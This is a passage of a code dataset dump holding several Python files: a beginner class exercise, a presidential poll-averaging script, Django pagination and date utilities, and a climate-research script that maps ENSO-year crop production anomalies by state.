classes.\n\nclass human:\n\n def __init__(self, name):\n self.name = name\n self.bladder = 0\n\n def greet(self):\n print(\"Hello my name is \" + self.name)\n\n def drink(self):\n print(self.name + \" is drinking!\")\n self.bladder += 3 \n if self.bladder > 6:\n print(\"You really need to go to the bathroom!\")\n elif self.bladder > 3: \n print(\"You may need to go to the bathroom soon!\")\n \n\n def bladder_level(self):\n print(\"Your bladder is this full: \" + str(self.bladder))\n\n def bathroom(self):\n print(self.name + \" went to the bathroom!\")\n self.bladder -= 3\n\nperson = human(\"Mike\")\nperson.greet()\nperson.bladder_level()\nperson.drink()\nperson.bladder_level()\nperson.drink()\nperson.bladder_level()\nperson.drink()\nperson.bladder_level()\nperson.bathroom()\nperson.bladder_level()\n\n# class Human:\n\n# def __init__(self, fname, lname, age, sex):\n# self.fname = fname\n# self.lname = lname\n# self.age = age\n# self.sex = sex\n\n# def intro(self):\n# print(\"Hello \" + self.fname.title() + \" I am pleased to meet you!\")\n\n# def walk(self):\n# print(self.fname.title() + \" is now walking!\")\n\n# def sleep(self):\n# print(self.fname.title() + \" is now sleeping!\")\n\n# def running(self):\n# print(self.fname.tite() + \" is now running!\")\n\n\n# first = Human(\"adam\", \" \", 10, \"male\")\n# first.intro()\n# first.walk()\n# first.sleep()","sub_path":"nine/human.py","file_name":"human.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"236296350","text":"import csv\nimport numpy as np\nimport math\nfrom datetime import date\n\nfilename = 'Data/president_polls.csv'\n\nabbrevs = {\n 'Alabama': 'AL',\n 'Alaska': 'AK',\n 'Arizona': 'AZ',\n 'Arkansas': 
'AR',\n    'California': 'CA',\n    'Colorado': 'CO',\n    'Connecticut': 'CT',\n    'Delaware': 'DE',\n    'District of Columbia': 'DC',\n    'Florida': 'FL',\n    'Georgia': 'GA',\n    'Hawaii': 'HI',\n    'Idaho': 'ID',\n    'Illinois': 'IL',\n    'Indiana': 'IN',\n    'Iowa': 'IA',\n    'Kansas': 'KS',\n    'Kentucky': 'KY',\n    'Louisiana': 'LA',\n    'Maine': 'ME',\n    'Maryland': 'MD',\n    'Massachusetts': 'MA',\n    'Michigan': 'MI',\n    'Minnesota': 'MN',\n    'Mississippi': 'MS',\n    'Missouri': 'MO',\n    'Montana': 'MT',\n    'Nebraska': 'NE',\n    'Nevada': 'NV',\n    'New Hampshire': 'NH',\n    'New Jersey': 'NJ',\n    'New Mexico': 'NM',\n    'New York': 'NY',\n    'North Carolina': 'NC',\n    'North Dakota': 'ND',\n    'Ohio': 'OH',\n    'Oklahoma': 'OK',\n    'Oregon': 'OR',\n    'Pennsylvania': 'PA',\n    'Rhode Island': 'RI',\n    'South Carolina': 'SC',\n    'South Dakota': 'SD',\n    'Tennessee': 'TN',\n    'Texas': 'TX',\n    'Utah': 'UT',\n    'Vermont': 'VT',\n    'Virginia': 'VA',\n    'Washington': 'WA',\n    'West Virginia': 'WV',\n    'Wisconsin': 'WI',\n    'Wyoming': 'WY'\n}\n\n\n\nclass Poll(object):\n    \"\"\"\n    A poll gives a rough estimate of how the electorate in a state is thinking\n    \"\"\"\n    def __init__(self, question_id, end=None, state=None, pop=None, rate=None, sample=None, method=None, Dpct = 0, Rpct = 0):\n        self.question_id = question_id\n        self.date = end\n        self.state = state\n        self.pop = pop\n        self.rate = rate\n        self.sample = sample\n        self.method = method\n        self.Dpct = Dpct\n        self.Rpct = Rpct\n    \n    def getDpct(self):\n        return self.Dpct\n    \n    def getRpct(self):\n        return self.Rpct\n    \n    \n    def addDpct(self, Dpct):\n        self.Dpct = Dpct\n    \n    def addRpct(self, Rpct):\n        self.Rpct = Rpct\n    \n    def getPop(self):\n        return self.pop\n    \n    def getMethod(self):\n        return self.method\n    \n    def getMargin(self):\n        return self.Rpct - self.Dpct\n    \n    def getGrade(self):\n        return self.rate\n    \n    def getSample(self):\n        return self.sample\n\n    def __str__(self):\n        if self.getMargin() > 0:\n            m = \"Trump +\" + str(self.getMargin())\n        elif self.getMargin() < 0:\n            m = \"Biden +\" + str(-self.getMargin())\n        else:\n            m = \"TIE\"\n        return self.state + \" Date: \"+ self.date + \" Result: \" + m\n    \n    def __eq__(self, other):\n        return self.question_id == other.question_id\n\ndef loadPolls(file, states):\n    polls = {}\n    for state in states:\n        polls[state] = []\n    pending = {}\n    day = str(date.today()).split('-')\n    with open(file, \"r\") as f:\n        reader = csv.DictReader(f)\n        for row in reader:\n            qid = row[\"question_id\"]\n            end = row[\"end_date\"]\n            intime = False\n            if end != '':\n                enddate = end.split('/')\n                if (int(day[1]) - int(enddate[0]) <= 1) or (int(day[1]) - int(enddate[0]) == 2 and int(day[2]) <= int(enddate[1])):\n                    if enddate[2] == \"2020\" or enddate[2] == \"20\":\n                        intime = True\n            \n            if (row['state'] in abbrevs and row['fte_grade'] != '' and row['sponsor_candidate'] == ''\n                and row['partisan'] == '' and row['tracking'] == '' and row['sample_size'] != '' and intime):\n                \n                if qid not in pending.keys():\n                    try:\n                        pending[qid] = Poll(qid, end=end, state=row['state'], \n                                            pop=row['population_full'],rate=row['fte_grade'],\n                                            sample=int(row['sample_size']),method=row[\"methodology\"])\n                    except:\n                        raise ValueError(qid)\n                if row[\"answer\"] == \"Biden\":\n                    pending[qid].addDpct(float(row[\"pct\"]))\n                elif row[\"answer\"] == \"Trump\":\n                    pending[qid].addRpct(float(row[\"pct\"]))\n                try:\n                    if pending[qid].getDpct() != 0 and pending[qid].getRpct() != 0:\n                        polls[row['state']].append(pending[qid])\n                        del pending[qid]\n                except:\n                    pass\n    return polls\n\ndef getAS(polls, states):\n    \"\"\"\n    Uses a list of polls to get an average and standard 
deviation for each state\n    Where output[state] = (average, standard deviation) or (None, None) if no polls are available\n    \"\"\"\n    ans = {} #average, standard deviation\n    rates = {\"A+\":1, \"A\": 0.9, \"A-\": 0.8, \"B+\": 0.7, \"B\": 0.6, \"B-\": 0.5, \"C+\": 0.45, \"C\": 0.4, \"C-\": 0.35, \"D+\": 0.3, \"D\": 0.25, \"D-\": 0.2, \"F\": 0.1, 'A/B': 0.6, 'B/C': 0.4, 'C/D': 0.25}\n    pops = {\"lv\": 1, \"v\": 0.9, \"rv\": 0.8, \"a\": 0.75}\n    methods = {'Online': 0.5, 'Automated Phone': 1, 'IVR/Online': 0.6, 'Online/IVR': 0.6, 'Live Phone': 1.2, \n               'IVR/Text': 0.75, 'Online/Text': 0.6, 'IVR/Live Phone': 1, 'Live Phone/Online/Text': 0.75, \n               'Text': 0.8, 'Live Phone/Online': 0.8, 'Live Phone/Text': 1}\n    for state in states:\n        p = polls[state]\n        average = 0\n        size = 0\n        count = 0\n        for poll in p:\n            average += poll.getMargin()\n            size += poll.getSample() * rates[poll.getGrade()] * pops[poll.getPop()] * methods[poll.getMethod()]\n            count += 1\n        try:\n            ans[states[state]] = (round(average/count,3), round(100/math.sqrt(size/count)/1.96, 3))\n        except ZeroDivisionError:\n            ans[states[state]] = (None, None)\n    return ans","sub_path":"Predict.py","file_name":"Predict.py","file_ext":"py","file_size_in_byte":5791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"100386334","text":"import datetime\nfrom datetime import timedelta\nimport settings\n\nfrom django.core.paginator import Paginator, InvalidPage, EmptyPage\n\nfrom hq.models import *\nfrom graphing.models import *\n\n\n\n\n#get members under this supervisor for this group\ndef get_members_for_supervisor(organization, supervisor_user): \n    pass\n\ndef get_supervisor_roles(user):\n    \"\"\"return an array of organizations that a user is a supervisor of. The array is empty if they are nothing\"\"\"\n    raise Exception(\"Someone needs to fix this method to no longer be dependent on model relationship if they're going to use it!\")\n    \ndef get_membership(user):\n    \"\"\"return an array of organizations that a user belongs to. 
The array is empty if they are nothing\"\"\"\n raise Exception(\"Someone needs to fix this method to no longer be dependent on model relationship if they're going to use it!\")\n\ndef get_members(organization):\n \"\"\"return an array of members in an organization\"\"\"\n raise Exception(\"Someone needs to fix this method to no longer be dependent on model relationship if they're going to use it!\")\n\ndef get_chart_group(user):\n # todo this makes a mean assumption there's only one\n # group \n try:\n prefs = GraphPref.objects.get(user=user)\n return prefs.root_graphs.all()[0]\n except GraphPref.DoesNotExist:\n return None\n\n\ndef get_members_and_supervisors(organization):\n \"\"\"Return a tuple (members[], supervisors[]) for a given organization.\n Deals with the empty lists and null objects for you so you don't have \n to.\n The contents of the tuples are reporter objects.\n \"\"\"\n members = []\n supervisors = []\n if organization:\n if organization.members:\n members = organization.members.reporters.all()\n if organization.supervisors:\n supervisors = organization.supervisors.reporters.all() \n return (members, supervisors)\n \n \ndef get_user_affiliation(user):\n (parents, children) = traversal.getImmediateRelationsForObject(user)\n raise Exception(\"Someone needs to fix this method to no longer be dependent on model relationship if they're going to use it!\")\n \ndef get_dates(request, default_days=0):\n default_delta = timedelta(days=default_days)\n enddate = datetime.datetime.now().date()\n startdate = enddate - default_delta\n if request:\n for item in request.GET.items():\n if item[0] == 'startdate':\n startdate_str=item[1]\n startdate = datetime.datetime.strptime(startdate_str,'%m/%d/%Y').date()\n if item[0] == 'enddate':\n enddate_str=item[1]\n enddate = datetime.datetime.strptime(enddate_str,'%m/%d/%Y').date()\n return (startdate, enddate)\n\ndef get_dates_reports(request, default_days_active=0, default_days_late=0):\n default_delta_active = timedelta(days=default_days_active)\n default_delta_late = timedelta(days=default_days_late)\n enddate = datetime.datetime.now().date()\n startdate_active = enddate - default_delta_active\n startdate_late = enddate - default_delta_late\n if request:\n for item in request.GET.items():\n if item[0] == 'startdate_active':\n startdate_active_str=item[1]\n startdate_active = datetime.datetime.strptime(\n startdate_active_str,'%m/%d/%Y').date()\n if item[0] == 'startdate_late':\n startdate_late_str=item[1]\n startdate_late = datetime.datetime.strptime(\n startdate_late_str,'%m/%d/%Y').date()\n if item[0] == 'enddate':\n enddate_str=item[1]\n enddate = datetime.datetime.strptime(enddate_str,\n '%m/%d/%Y').date()\n return (startdate_active, startdate_late, enddate)\n\ndef get_table_display_properties(request, default_items=25, default_sort_column = \"id\", \n default_sort_descending = True, default_filters = {}):\n \"\"\"Extract some display properties from a request object. The following \n parameters (with default values) are extracted. 
Any of the defaults\n    can be overridden by passing in values.\n    items: 25 (the number of items to paginate at a time)\n    sort_column: id (the column to sort by)\n    sort_descending: True (the sort order of the column)\n    filters: {} (key, value pairs of filters to apply)\n    \"\"\"\n    items = default_items\n    sort_column = default_sort_column\n    sort_descending = default_sort_descending\n    # odd, for some reason pass-by-reference can confuse the default types here\n    filters = default_filters.copy()\n    # if no request found, just resort to all the defaults, but \n    # don't fail hard.\n    if request:\n        # extract from request\n        if \"items\" in request.GET:\n            try:\n                items = int(request.GET[\"items\"])\n            except Exception:\n                # just default to the above if we couldn't \n                # parse it\n                pass\n        if \"sort_column\" in request.GET:\n            sort_column = request.GET[\"sort_column\"]\n        if \"sort_descending\" in request.GET:\n            # a very dumb boolean parser\n            sort_descending_str = request.GET[\"sort_descending\"]\n            if sort_descending_str.startswith(\"f\"):\n                sort_descending = False\n            else:\n                sort_descending = True\n        found_filters = {}\n        for param in request.GET:\n            if param.startswith('filter_'):\n                # we convert 'filter_x' into 'x' (the name of the field)\n                field = param.split('_',1)[-1]\n                found_filters[str(field)] = request.GET[param]\n        if found_filters:\n            filters = found_filters\n    return (items, sort_column, sort_descending, filters)\n    \ndef get_query_set(model_class, sort_column=\"id\", sort_descending=True, filters={}):\n    \"\"\"Gets a query set, based on the results of the get_table_display_properties\n    method, and a model.\"\"\" \n    sort_modifier = \"\"\n    if sort_descending:\n        sort_modifier = \"-\"\n    return model_class.objects.filter(**filters).order_by(\"%s%s\"% (sort_modifier, sort_column))\n    \ndef paginate(request, data, rows_per_page=25):\n    '''Helper call to provide django pagination of data'''\n    paginator = Paginator(data, rows_per_page) \n    try:\n        page = int(request.GET.get('page', '1'))\n    except ValueError:\n        page = 1\n    try:\n        data_pages = paginator.page(page)\n    except (EmptyPage, InvalidPage):\n        data_pages = paginator.page(paginator.num_pages)\n    return data_pages\n\ndef build_url(relative_path, request=None):\n    '''Attempt to build a fully qualified url. It will first try to back\n    it out of the request object, if specified. Failing that it will \n    look for a django setting: SERVER_ROOT_URL. Failing that, it defaults\n    to localhost:8000.\n    '''\n    if request:\n        return request.build_absolute_uri(relative_path)\n    elif hasattr(settings, \"SERVER_ROOT_URL\"):\n        return \"%s%s\" % (settings.SERVER_ROOT_URL, relative_path)\n    else:\n        return \"http://localhost:8000%s\" % relative_path\n    ","sub_path":"apps/hq/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"76753491","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 24 23:33:01 2016\n@author: westonanderson\n\nEstimates of ENSO induced yield variability trends\n\nAnalysis Structure\n1. Establish that trends in production variability exist\n2. Establish that ENSO is the dominant driver of production variability\n3. Remove ENSO-induced changes in production, look at remaining trends in variability\n4. Estimate possible trends in ENSO-induced production variability via\n\t4.0. Phase randomization of production PCs directly\n    4.1 Regress onto current yields, phase randomize ENSO\n\t4.2. Regression onto paleo estimates of ENSO\n\t4.3. 
Regression onto CMIP-5 estimates of ENSO?\n5. Compare observed production variability over the latter period (1996-2010) \n and early period (1980-1995) to possible production variability in 15 yr windows\n\n\nEDIT - 12/17/16 - script created to compare to the multi-EOF function\n\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport time\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\nfrom matplotlib.patches import Polygon\nfrom scipy import stats\nimport matplotlib.cm as cm\nfrom matplotlib.colors import Normalize\nstart = time.clock()\n\npvalThresh = 1\ncrops = ['maize']#,'maize','soy','wheat']#\nloadNotes = '_pacBasin' #'_US_long'\navg = 'mean'#'median' or 'mean'\ncomps = ['LN'] #EN, LN or diff\nclrMax = .25\nclrBr = np.arange(-clrMax,clrMax+.01,.01)\nnorm = Normalize(vmin=-clrMax, vmax=clrMax, clip=False)\nmapper=cm.ScalarMappable(norm=norm, cmap='BrBG')\n\n#ENyrs = np.array([1982, 1986, 1991, 1994, 1997, 2002, 2004, 2006, 2009]) #EN, not possible with SWC included\n#LNyrs = np.array([1983, 1988, 1995, 1998, 2007, 2010]) #LN, not possible with SWC included\n\n#Composites built on +/- 0.5 SST anomaly in NDJ\nENyrs = np.array([1982, 1986, 1987, 1991, 1994, 1997, 2002, 2004, 2006, 2009]) \nLNyrs = np.array([1983, 1984, 1988, 1995, 1996, 1998, 1999, 2000, 2005, 2007, 2008, 2010])\n\n\n\n#^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*#\n# Helper Functions #\n#^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*#\n#Read in moving average. \n# moving_average(a, smooth)\nexec(open('/Users/weston/Desktop/Columbia/Research/Code/PyCode/general/helper_Functions/movingAverage.py').read())\n#Read in moving standard deviation moving_std(a, smooth)\nexec(open('/Users/weston/Desktop/Columbia/Research/Code/PyCode/general/helper_Functions/movingStd.py').read())\n#create surrogate timeseries\n#follows from Ebusuzaki (1997) and Schrieber and Shmitz (2000)\n# function call is ############ surrogate(input TS): ############ #\nexec(open('/Users/weston/Desktop/Columbia/Research/Code/PyCode/general/helper_Functions/surrogateData.py').read())\n#GADM dict to link to shapefiles\nexec(open('/Users/weston/Desktop/Columbia/Research/Code/PyCode/general/helper_Functions/GADM_dict.py').read())\n\n#^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*#\n# Calculate trends in variability #\n#^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*~^~*#\nfor comp in comps:\n for crop in crops:\n if crop is 'soy': \n LNyr='LN'\n chnLag = '' #'CHNlag' or ''\n usLag = '' #'USlag' or ''\n elif crop is 'maize':\n LNyr='LN'\n chnLag = 'CHNlag'\n usLag = ''\n elif crop is 'wheat': \n LNyr='LN'\n chnLag = 'CHNlag'\n usLag = 'USlag'\n if loadNotes == '_pacBasin':\n ensoMon =11\n yrMin = '1980'\n yrMax = '2010'\n csvNameMin = '1980'\n csvNameMax = '2010'\n elif loadNotes == '_US_long':\n if (crop == 'wheat'):\n ensoMon =11\n yrMin = '1925'\n yrMax = '2013'\n csvNameMin = '1925'\n csvNameMax = '2015'\n elif (crop == 'maize'):\n ensoMon =11\n yrMin = '1925'\n yrMax = '2013'\n csvNameMin = '1900'\n csvNameMax = '2015'\n elif (crop == 'soy'):\n ensoMon =11\n yrMin = '1925'\n yrMax = '2013'\n csvNameMin = '1925'\n csvNameMax = '2015' \n stOffset =int(yrMin)- int(csvNameMin)\n endOffset =int(yrMax)- int(csvNameMin)+1\n \n \n CRdata = pd.DataFrame.from_csv('/Volumes/Data_Archive/Results/globalCorrelatedRisks/'+\n 'cropYieldEOFs/ProductionAnoms/rawData_'+crop+'_'+csvNameMin+'_'+csvNameMax+LNyr+loadNotes+usLag+chnLag+'.csv')\n CRdata.set_index(['state','year'],drop=True,inplace=True)\n \n CRexp = 
np.zeros([1,CRdata.index.levels[1].size])\n CRpctAnom = np.zeros([CRdata.index.levels[0].size,int(yrMax)-int(yrMin)+1])\n \n #CRwgt = CRdata['expectedProdGau'].loc[:,2010].values/np.nansum(CRdata['expectedProdGau'].loc[:,2010].values)\n #CRwgt[np.isnan(CRwgt)]=0\n CRwgt = np.ones([CRdata.index.levels[0].size])\n CRha = CRdata['Harvested_Area'].loc[:,2010].values\n \n yr = 0\n for iyr in range(int(yrMin),int(yrMax)+1):\n CRexp[0,yr]=np.nansum(CRdata['expectedProdGau'].loc[:,iyr])\n CRpctAnom[:,yr] = CRdata['prodAnomGau'].loc[:,iyr].values / CRexp[0,yr]\n yr=yr+1\n \n CRpct_EN = CRpctAnom[:,ENyrs-int(yrMin)]\n CRpct_LN = CRpctAnom[:,LNyrs-int(yrMin)]\n if comp is 'diff':\n if avg is 'median':\n CRpct_diff = np.nanmedian(CRpct_EN,1)-np.nanmedian(CRpct_LN,1)\n elif avg is 'mean':\n CRpct_diff = np.nanmean(CRpct_EN,1)-np.nanmean(CRpct_LN,1)\n CRpVal = stats.ttest_ind(CRpct_EN,CRpct_LN,axis=1,equal_var='True').pvalue\n CRpct_diff = ((CRpct_diff)*100)\n elif comp is 'EN':\n if avg is 'median':\n CRpct_diff = np.nanmedian(CRpct_EN,1)\n elif avg is 'mean':\n CRpct_diff = np.nanmean(CRpct_EN,1)\n CRpVal = stats.ttest_1samp(CRpct_EN,0,axis=1).pvalue\n CRpct_diff = ((CRpct_diff)*100)\n elif comp is 'LN':\n if avg is 'median':\n CRpct_diff = np.nanmedian(CRpct_LN,1)\n elif avg is 'mean':\n CRpct_diff = np.nanmean(CRpct_LN,1)\n CRpVal = stats.ttest_1samp(CRpct_LN,0,axis=1).pvalue\n CRpct_diff = ((CRpct_diff)*100)\n eof_states = CRdata['prodAnomGau'].loc[:,2010].index.values\n\n #calibrate the color bar for later\n #clMin = -np.nanmax(np.nanmax(CRpct_diff),-np.nanmin(CRpct_diff))\n #clMax = np.nanmax(np.nanmax(CRpct_diff),-np.nanmin(CRpct_diff))\n #clDelt = (clMin-clMax)/25\n #clrBr = np.arange(clMin,clMax+clDelt,clDelt)\n #norm = Normalize(vmin=clMin, vmax=clMax, clip=True)\n #mapper=cm.ScalarMappable(norm=norm, cmap='BrBG')\n CRpct_diff[(CRpVal>pvalThresh)]=0\n CRpct_diff[np.isnan(CRpct_diff)]=0\n \n if crop is 'maize': \n plt.figure()\n m = Basemap(llcrnrlon=-120,llcrnrlat=10,urcrnrlon=-65,urcrnrlat=50,\n lat_1=30,lat_2=50,lat_0=40,lon_0=-100,projection='lcc')\n USshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/USA_adm_shp/USA_adm1', \n name='states', drawbounds=True)\n # collect the state names from the shapefile attributes so we can look up the shape obect for a state by it's name\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if (shape_dict['HASC_1']=='US.AK')|(shape_dict['HASC_1']=='US.DC')|(shape_dict['HASC_1']=='US.HI'):\n colors[shape_dict['HASC_1']]=0\n elif len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly) \n \n MXshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/MEX_adm_shp/MEX_adm1', \n name='states', drawbounds=True)\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = 
Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly)\n mapper.set_array(clrBr);plt.colorbar(mapper)\n plt.savefig('/Users/weston/Desktop/Columbia/Research/Results/ENSO_varTrnds/yldComposite/'+crop+'/NorthAmerica_'+avg+comp+str(pvalThresh)+'.png')\n plt.close()\n elif crop is 'soy':\n plt.figure()\n m = Basemap(llcrnrlon=-120,llcrnrlat=15,urcrnrlon=-65,urcrnrlat=50,\n lat_1=30,lat_2=50,lat_0=40,lon_0=-100,projection='lcc')\n USshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/USA_adm_shp/USA_adm1', \n name='states', drawbounds=True)\n # collect the state names from the shapefile attributes so we can look up the shape obect for a state by it's name\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if (shape_dict['HASC_1']=='US.AK')|(shape_dict['HASC_1']=='US.DC')|(shape_dict['HASC_1']=='US.HI'):\n colors[shape_dict['HASC_1']]=0\n elif len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly) \n mapper.set_array(clrBr);plt.colorbar(mapper)\n plt.savefig('/Users/weston/Desktop/Columbia/Research/Results/ENSO_varTrnds/yldComposite/'+crop+'/NorthAmerica_'+avg+comp+str(pvalThresh)+'.png')\n plt.close() \n elif crop is 'wheat': \n plt.figure()\n m = Basemap(llcrnrlon=-120,llcrnrlat=20,urcrnrlon=-40,urcrnrlat=60,\n lat_1=35,lat_2=55,lat_0=45,lon_0=-100,projection='lcc')\n USshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/USA_adm_shp/USA_adm1', \n name='states', drawbounds=True)\n # collect the state names from the shapefile attributes so we can look up the shape obect for a state by it's name\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if (shape_dict['HASC_1']=='US.AK')|(shape_dict['HASC_1']=='US.DC')|(shape_dict['HASC_1']=='US.HI'):\n colors[shape_dict['HASC_1']]=0\n elif len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly) \n \n CAshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/CAN_adm_shp/CAN_adm1', \n name='states', drawbounds=True)\n # collect the state names from the shapefile attributes so we can look up the shape obect for a state by it's name\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly)\n mapper.set_array(clrBr);plt.colorbar(mapper)\n 
plt.savefig('/Users/weston/Desktop/Columbia/Research/Results/ENSO_varTrnds/yldComposite/'+crop+'/NorthAmerica_'+avg+usLag+comp+str(pvalThresh)+'.png')\n plt.close() \n \n plt.figure()\n m = Basemap(llcrnrlon=95,llcrnrlat=-45,urcrnrlon=155,urcrnrlat=0, \n lat_1=-15,lat_2=-35,lat_0=-25,lon_0=120,projection='lcc')\n AUshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/AUS_adm_shp/AUS_adm1', \n name='states', drawbounds=True)\n \n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly)\n mapper.set_array(clrBr);plt.colorbar(mapper)\n plt.savefig('/Users/weston/Desktop/Columbia/Research/Results/ENSO_varTrnds/yldComposite/'+crop+'/Australia_'+avg+usLag+comp+str(pvalThresh)+'.png')\n plt.close() \n \n plt.figure()\n m = Basemap(llcrnrlon=88,llcrnrlat=11,urcrnrlon=145,urcrnrlat=55,\n lat_1=45,lat_2=65,lat_0=55,lon_0=120,projection='lcc')\n CNshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/CHN_adm_shp/CHN_adm1', \n name='states', drawbounds=True)\n # collect the state names from the shapefile attributes so we can look up the shape obect for a state by it's name\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if (shape_dict['HASC_1']=='CN.XZ')|(shape_dict['HASC_1']=='CN.TJ'):\n colors[shape_dict['HASC_1']]=0\n elif len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly) \n mapper.set_array(clrBr);plt.colorbar(mapper)\n plt.savefig('/Users/weston/Desktop/Columbia/Research/Results/ENSO_varTrnds/yldComposite/'+crop+'/China_'+avg+chnLag+comp+str(pvalThresh)+'.png')\n plt.close() \n \n plt.figure()\n m = Basemap(llcrnrlon=-90,llcrnrlat=-60,urcrnrlon=-25,urcrnrlat=10,\n lat_1=-15,lat_2=-5,lat_0=-10,lon_0=-70,projection='lcc')\n BRshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/BRA_adm_shp/BRA_adm1', \n name='states', drawbounds=True)\n # collect the state names from the shapefile attributes so we can look up the shape obect for a state by it's name\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if (shape_dict['HASC_1']=='BR.AM'):\n colors[shape_dict['HASC_1']]=0\n elif len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly) \n ARshp = m.readshapefile('/Volumes/Data_Archive/Data/adminBoundaries/GADM/ARG_adm_shp/ARG_adm1', \n name='states', drawbounds=True)\n # collect the state names from the shapefile attributes so we can look 
